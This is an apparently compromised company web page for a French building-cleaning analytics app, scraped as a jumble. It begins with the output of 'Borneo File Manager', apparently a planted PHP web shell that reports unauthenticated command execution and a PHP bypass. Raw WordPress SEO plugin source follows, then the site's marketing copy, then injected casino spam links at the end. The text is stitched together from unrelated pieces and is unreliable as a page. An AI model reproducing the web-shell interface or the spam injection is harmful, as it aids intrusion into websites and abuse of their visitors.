Borneo File Manager
File Manager v1.0
Linux 5.4.0-216-generic arithmetic.fr No Auth
Features
Scanner
Tools
arithmetic.fr@vps-1cfacc52 $
Exec: Available | Bypass: UAF PHP 8.1 | Disabled: None
Name Type Size Permission Actions
accessibility Folder 0755
acpi Folder 0755
amba Folder 0755
android Folder 0755
ata Folder 0755
atm Folder 0755
auxdisplay Folder 0755
base Folder 0755
bcma Folder 0755
block Folder 0755
bluetooth Folder 0755
bus Folder 0755
cdrom Folder 0755
char Folder 0755
clk Folder 0755
clocksource Folder 0755
connector Folder 0755
counter Folder 0755
cpufreq Folder 0755
cpuidle Folder 0755
crypto Folder 0755
dax Folder 0755
dca Folder 0755
devfreq Folder 0755
dio Folder 0755
dma Folder 0755
dma-buf Folder 0755
edac Folder 0755
eisa Folder 0755
extcon Folder 0755
firewire Folder 0755
firmware Folder 0755
fpga Folder 0755
fsi Folder 0755
gnss Folder 0755
gpio Folder 0755
gpu Folder 0755
greybus Folder 0755
hid Folder 0755
hsi Folder 0755
hv Folder 0755
hwmon Folder 0755
hwspinlock Folder 0755
hwtracing Folder 0755
i2c Folder 0755
i3c Folder 0755
ide Folder 0755
idle Folder 0755
iio Folder 0755
infiniband Folder 0755
input Folder 0755
interconnect Folder 0755
iommu Folder 0755
ipack Folder 0755
irqchip Folder 0755
isdn Folder 0755
leds Folder 0755
lightnvm Folder 0755
macintosh Folder 0755
mailbox Folder 0755
mcb Folder 0755
md Folder 0755
media Folder 0755
memory Folder 0755
memstick Folder 0755
message Folder 0755
mfd Folder 0755
misc Folder 0755
mmc Folder 0755
mtd Folder 0755
mux Folder 0755
net Folder 0755
nfc Folder 0755
ntb Folder 0755
nubus Folder 0755
nvdimm Folder 0755
nvme Folder 0755
nvmem Folder 0755
of Folder 0755
opp Folder 0755
parisc Folder 0755
parport Folder 0755
pci Folder 0755
pcmcia Folder 0755
perf Folder 0755
phy Folder 0755
pinctrl Folder 0755
platform Folder 0755
pnp Folder 0755
power Folder 0755
powercap Folder 0755
pps Folder 0755
ps3 Folder 0755
ptp Folder 0755
pwm Folder 0755
rapidio Folder 0755
ras Folder 0755
regulator Folder 0755
remoteproc Folder 0755
reset Folder 0755
rpmsg Folder 0755
rtc Folder 0755
s390 Folder 0755
sbus Folder 0755
scsi Folder 0755
sfi Folder 0755
sh Folder 0755
siox Folder 0755
slimbus Folder 0755
soc Folder 0755
soundwire Folder 0755
spi Folder 0755
spmi Folder 0755
ssb Folder 0755
staging Folder 0755
target Folder 0755
tc Folder 0755
tee Folder 0755
thermal Folder 0755
thunderbolt Folder 0755
tty Folder 0755
uio Folder 0755
usb Folder 0755
vfio Folder 0755
vhost Folder 0755
video Folder 0755
virt Folder 0755
virtio Folder 0755
visorbus Folder 0755
vlynq Folder 0755
vme Folder 0755
w1 Folder 0755
watchdog Folder 0755
xen Folder 0755
zorro Folder 0755
Kconfig File 3.7 KB 0644
Makefile File 5.25 KB 0644
* Plugin Name: All in One SEO * Plugin URI: https://aioseo.com/ * Description: SEO for WordPress. Features like XML Sitemaps, SEO for custom post types, SEO for blogs, business sites, ecommerce sites, and much more. More than 100 million downloads since 2007. * Author: All in One SEO Team * Author URI: https://aioseo.com/ * Version: 4.9.10 * Text Domain: all-in-one-seo-pack * Domain Path: /languages * License: GPL-3.0+ * * All in One SEO is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 2 of the License, or * any later version. * * All in One SEO is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with AIOSEO. If not, see . * * @since 4.0.0 * @author All in One SEO Team * @package AIOSEO\Plugin * @license GPL-3.0+ * @copyright Copyright © 2025, All in One SEO */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } require_once dirname( __FILE__ ) . '/app/init/init.php'; // Check if this plugin should be disabled. if ( aioseoMaybePluginIsDisabled( __FILE__ ) ) { return; } if ( ! defined( 'AIOSEO_PHP_VERSION_DIR' ) ) { define( 'AIOSEO_PHP_VERSION_DIR', basename( dirname( __FILE__ ) ) ); } require_once dirname( __FILE__ ) . '/app/init/notices.php'; require_once dirname( __FILE__ ) . '/app/init/activation.php'; // We require PHP 7.1 or higher for the whole plugin to work. if ( version_compare( PHP_VERSION, '7.1', '<' ) ) { add_action( 'admin_notices', 'aioseo_php_notice' ); // Do not process the plugin code further. return; } // We require WordPress 5.7 or higher for the whole plugin to work. global $wp_version; // phpcs:ignore Squiz.NamingConventions.ValidVariableName if ( version_compare( $wp_version, '5.7', '<' ) ) { // phpcs:ignore Squiz.NamingConventions.ValidVariableName add_action( 'admin_notices', 'aioseo_wordpress_notice' ); // Do not process the plugin code further. return; } if ( ! defined( 'AIOSEO_DIR' ) ) { define( 'AIOSEO_DIR', __DIR__ ); } if ( ! defined( 'AIOSEO_FILE' ) ) { define( 'AIOSEO_FILE', __FILE__ ); } // Don't allow multiple versions to be active. if ( function_exists( 'aioseo' ) ) { add_action( 'activate_all-in-one-seo-pack/all_in_one_seo_pack.php', 'aioseo_lite_just_activated' ); add_action( 'deactivate_all-in-one-seo-pack/all_in_one_seo_pack.php', 'aioseo_lite_just_deactivated' ); add_action( 'activate_all-in-one-seo-pack-pro/all_in_one_seo_pack.php', 'aioseo_pro_just_activated' ); add_action( 'admin_notices', 'aioseo_lite_notice' ); // Do not process the plugin code further. return; } // We will be deprecating these versions of PHP in the future, so we'll let the user know. // We flag deprecated WP versions in the DeprecatedWordPress class. if ( version_compare( PHP_VERSION, '7.4', '<' ) ) { add_action( 'admin_notices', 'aioseo_php_notice_deprecated' ); } // Define the class and the function. // The AIOSEOAbstract class is required here because it can't be autoloaded. require_once dirname( __FILE__ ) . '/app/AIOSEOAbstract.php'; require_once dirname( __FILE__ ) . '/app/AIOSEO.php'; aioseo(); Arithmetic

Caractéristiques générales

Ce que nous proposons

Une application dédiée à l’entretien ménager des parties communes
Une interface agile et intuitive
Une totale maîtrise des informations collectées
Un contenu personnalisable
Une traçabilité maîtrisée
Des reportings réguliers et spécifiques

Dashboard

3 étapes clés pour améliorer la qualité de service :

  • 01

    Connectez-vous à l'application en profitant de ses nombreuses fonctionnalités

  • 02

    Analysez vos résultats avec une interface web personnalisée

  • 03

    Améliorez la propreté des parties communes

les app arithmetic

Des solutions adaptées à vos besoins

Ari est à votre service et vous souhaite la bienvenue dans l’univers du Digital Analytics Process

les solutions arithmetic

En quelques chiffres

Logements

4,8 / 5

Sur les plateformes
de téléchargement

Contrôles qualité réalisé

Nombre de contrôles préventifs réalisés

Témoignages

Ce qu'en pensent nos clients

https://nvcasino-serbia.com/
AMPM Casino
Casino Infinity

x